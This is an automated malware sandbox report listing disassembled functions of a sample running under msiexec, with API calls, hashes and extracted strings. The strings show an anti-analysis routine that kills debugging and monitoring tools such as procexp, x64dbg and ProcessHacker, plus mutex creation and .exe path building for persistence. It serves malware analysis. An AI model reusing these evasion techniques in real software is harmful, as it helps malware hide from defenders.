                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Heap$AllocateCloseFileHandleProcessSize
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1391523307-0
                                                                                                                                                                                                                        • Opcode ID: 77a34d1da9b6139ca756fa0c259faa5e8e44d1f0fdd31c5d950aa5b7d4f57222
                                                                                                                                                                                                                        • Instruction ID: 5cbe682ff9da46979d5fc79606f2c64e0bf5effce1c49cda768ee0a5a4d7026e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77a34d1da9b6139ca756fa0c259faa5e8e44d1f0fdd31c5d950aa5b7d4f57222
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6A812C36708B8282EA50DB55F48436AF7A0FBC9B94F614536EA8D87B68DF7CD0448B11
                                                                                                                                                                                                                        Function 00007FF7EE063078 Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE064410: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EE0630B3), ref: 00007FF7EE0644A0
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE063BF0: RegDeleteKeyW.ADVAPI32 ref: 00007FF7EE063C08
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE063DF0: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF7EE063E03
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE063DF0: Process32FirstW.KERNEL32 ref: 00007FF7EE063E36
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE063DF0: CloseHandle.KERNEL32 ref: 00007FF7EE063E48
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE063DF0: wcscmp.MSVCRT ref: 00007FF7EE063E5D
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE063DF0: OpenProcess.KERNEL32 ref: 00007FF7EE063E73
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE063DF0: TerminateProcess.KERNEL32 ref: 00007FF7EE063E96
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE063DF0: CloseHandle.KERNEL32 ref: 00007FF7EE063EA4
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE063DF0: Process32NextW.KERNEL32 ref: 00007FF7EE063EB7
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE063DF0: CloseHandle.KERNEL32 ref: 00007FF7EE063EC9
                                                                                                                                                                                                                        • Sleep.KERNEL32 ref: 00007FF7EE063162
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseHandle$ProcessProcess32$CreateDeleteFirstNextOpenSleepSnapshotTerminateToolhelp32wcscmp
                                                                                                                                                                                                                        • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                        • API String ID: 4011447834-928700279
                                                                                                                                                                                                                        • Opcode ID: 7025b17d87294329de3cc266a73b50fcb0614222f694bb80ca69dde199845389
                                                                                                                                                                                                                        • Instruction ID: 97e4a11a789a7350391064df77575c786ffef05af5f95754a4dcee16d124460f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7025b17d87294329de3cc266a73b50fcb0614222f694bb80ca69dde199845389
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8A21A660B2850395EA00FB60FC923B5A265AF90350FF20D37D45E439E69EFDA54586F3
                                                                                                                                                                                                                        Function 00007FF7EE062E08 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID: rbNSpGEsyb
                                                                                                                                                                                                                        • API String ID: 299056699-189039185
                                                                                                                                                                                                                        • Opcode ID: 10555049a1e5e970aacc173f1715d106100e4f0dc8ec30993202ec39d8a78e4e
                                                                                                                                                                                                                        • Instruction ID: c112e01892b84c3dddd41ee88e50c3eac47bb6143914f1b29603a4b0a4a264da
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10555049a1e5e970aacc173f1715d106100e4f0dc8ec30993202ec39d8a78e4e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4C010C26B0CA4381E730EB11E854329A770FBD8B98FA50933D94E46B74CFBCD5858622
                                                                                                                                                                                                                        Function 00007FF7EE063890 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE063710: GetWindowsDirectoryW.KERNEL32 ref: 00007FF7EE063750
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE063710: GetVolumeInformationW.KERNEL32 ref: 00007FF7EE0637CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE063710: wsprintfW.USER32 ref: 00007FF7EE06386E
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EE063A75), ref: 00007FF7EE0638D9
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EE063A75), ref: 00007FF7EE0638EE
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EE063A75), ref: 00007FF7EE063901
                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EE063A75), ref: 00007FF7EE063911
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EE063A75), ref: 00007FF7EE063939
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EE063A75), ref: 00007FF7EE06394C
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EE063A75), ref: 00007FF7EE063961
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$CreateFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 943468954-4119554291
                                                                                                                                                                                                                        • Opcode ID: 7c7c7247d549d9e37f092b5a31a3711d0059d00c133cc5beb443fd3bd3c84089
                                                                                                                                                                                                                        • Instruction ID: 1b2bd63a79cb15fed325206cdec312ba68b0947fe5c8468e90d2332427cbc25e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c7c7247d549d9e37f092b5a31a3711d0059d00c133cc5beb443fd3bd3c84089
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC115171B2898385DB60EF25F86436AA361FBC4744F915432DA4E43E28DF7CD008C751
                                                                                                                                                                                                                        Function 00007FF7EE063DF0 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1083639309-0
                                                                                                                                                                                                                        • Opcode ID: 7a16b558b3a5aabe8e9edc648b30ff0989d79b9dce4d7edaa0226f1c99cc9121
                                                                                                                                                                                                                        • Instruction ID: 0dded2f457478dd8c1982e5b456a9ca41bfc4d8bbd2a4caa809779ed4c17b21f
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a16b558b3a5aabe8e9edc648b30ff0989d79b9dce4d7edaa0226f1c99cc9121
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D215E31B0CA8385E770EB11E84836AE3A1FBD4B54FA14632C69D429E8DF7DD445CB61
                                                                                                                                                                                                                        Function 00007FF7EE062EA8 Relevance: 12.0, APIs: 8, Instructions: 31synchronizationCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 299056699-0
                                                                                                                                                                                                                        • Opcode ID: 0ff44a8e6de8ed1e0195ea57690e214b8abe1ab05dd50aed0b9b1818bdfdce29
                                                                                                                                                                                                                        • Instruction ID: ae7b2a576c82e8c3747da0596f9dfb4e395063d0103fc035047362e1dce8b204
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ff44a8e6de8ed1e0195ea57690e214b8abe1ab05dd50aed0b9b1818bdfdce29
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37019635B1C943C2D720EB11E854329A370FBD9B45FA14936D58E46A74CF7CD5448622
                                                                                                                                                                                                                        Function 00007FF7EE063CB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                        • String ID: Unknown
                                                                                                                                                                                                                        • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                        • Opcode ID: fdec89f59edf3eb6797727eaad360a689e09697676163aab672e6b7c8a7a61d1
                                                                                                                                                                                                                        • Instruction ID: 45ccb0e1791ce74619c617a8ac5502f8925c72852e139da74fd1f83c6cb83ecf
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fdec89f59edf3eb6797727eaad360a689e09697676163aab672e6b7c8a7a61d1
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BE31F83261CAC586DB70EB15F8983AAB3A0FBC8740F500626DA8D83B68DF7CD140CB51
                                                                                                                                                                                                                        Function 00007FF7EE0613C4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: @$IsWow64Process$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-1447682865
                                                                                                                                                                                                                        • Opcode ID: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction ID: caed5d5a0901737b70d565841a610e00c10e220338a5729d29ad2f6423de51af
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 603be1d157d8b7618cefaeb4c28c3fa88968313c4e816e205eb4bf900121f03c
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C701EC31A0CA43C6E630AB11E444329A7A0FB84348FE14936D68D42A94DFBCD649CB11
                                                                                                                                                                                                                        Function 00007FF7EE063FD0 Relevance: 7.5, APIs: 5, Instructions: 35processCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2850635065-0
                                                                                                                                                                                                                        • Opcode ID: 7ef93d6c8be03e0e8067038787ae35eedaf0d19a6d09eeffd0ee61b9360f4694
                                                                                                                                                                                                                        • Instruction ID: 478c7901360868214acb0ca246209ad36f89cf87c8274a8c2e0511ffd2700668
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ef93d6c8be03e0e8067038787ae35eedaf0d19a6d09eeffd0ee61b9360f4694
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 94112E71B0C69781EB70EF50F48836AA3A0FB84764FA14736D69D42AA8DF7DD404CB21
                                                                                                                                                                                                                        Function 00007FF7EE063710 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                        • API String ID: 3001812590-640692576
                                                                                                                                                                                                                        • Opcode ID: ba7099422deb3340150bc710d1235fe6d0c1360a6f14ed1e57a7d3e671112d6e
                                                                                                                                                                                                                        • Instruction ID: 59a960978e6462adab4c5709a783771049ecdbb96ab956a3d106a8570f992d7c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba7099422deb3340150bc710d1235fe6d0c1360a6f14ed1e57a7d3e671112d6e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7F31F72661C6C28AD730EF64E4983ABB3A0FBC4740F905536E68D87A58DF7DC509CB91
                                                                                                                                                                                                                        Function 00007FF7EE061088 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                        • String ID: GetThreadId$kernel32
                                                                                                                                                                                                                        • API String ID: 1646373207-2383230424
                                                                                                                                                                                                                        • Opcode ID: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction ID: 863a83e39d164934c7356caaeaa7c06b48528151a4fdfd66a6ade54cd6f9afcc
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 189d8e18f2860e48d93cbf03eb1ea96f13b6a920ccedb7e9900926061dd2bf98
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92E07D31A18E83C2EE60AB50F854369A3A0FB84744FE10D36D58D42A64DFBCD559CB51
                                                                                                                                                                                                                        Function 00007FF7EE062F38 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE063890: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EE063A75), ref: 00007FF7EE0638D9
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE063890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EE063A75), ref: 00007FF7EE0638EE
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE063890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EE063A75), ref: 00007FF7EE063901
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE063890: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EE063A75), ref: 00007FF7EE063911
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE063890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EE063A75), ref: 00007FF7EE063939
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE063890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EE063A75), ref: 00007FF7EE06394C
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE063890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7EE063A75), ref: 00007FF7EE063961
                                                                                                                                                                                                                          • Part of subcall function 00007FF7EE0610D8: OpenProcess.KERNEL32 ref: 00007FF7EE0610FC
                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32 ref: 00007FF7EE062FD3
                                                                                                                                                                                                                        • HeapFree.KERNEL32 ref: 00007FF7EE062FE6
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 0000000A.00000002.1649613562.00007FF7EE061000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF7EE060000, based on PE: true
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649588802.00007FF7EE060000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649679597.00007FF7EE065000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649714498.00007FF7EE068000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649747256.00007FF7EE069000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 0000000A.00000002.1649779145.00007FF7EE06B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_10_2_7ff7ee060000_msiexec.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$HeapProcess$CreateDirectoryFolderFreeOpenPath
                                                                                                                                                                                                                        • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                                        • API String ID: 3579246950-2286007224
                                                                                                                                                                                                                        • Opcode ID: cb198f8349b0474e8430296de8ad644e8f73609a5c45828ea2168c8d2c9a5573
                                                                                                                                                                                                                        • Instruction ID: 9f2392e459367e86570377b56672b76528ae2ff58eec968d89b0e0619a8268f7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cb198f8349b0474e8430296de8ad644e8f73609a5c45828ea2168c8d2c9a5573
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 40110A61B28A8385E710FB50F8543A6A3A0FB84744FA20936E54C42A65DFBCE1458772

                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                        Execution Coverage:9.4%
                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                        Signature Coverage:0.6%
                                                                                                                                                                                                                        Total number of Nodes:2000
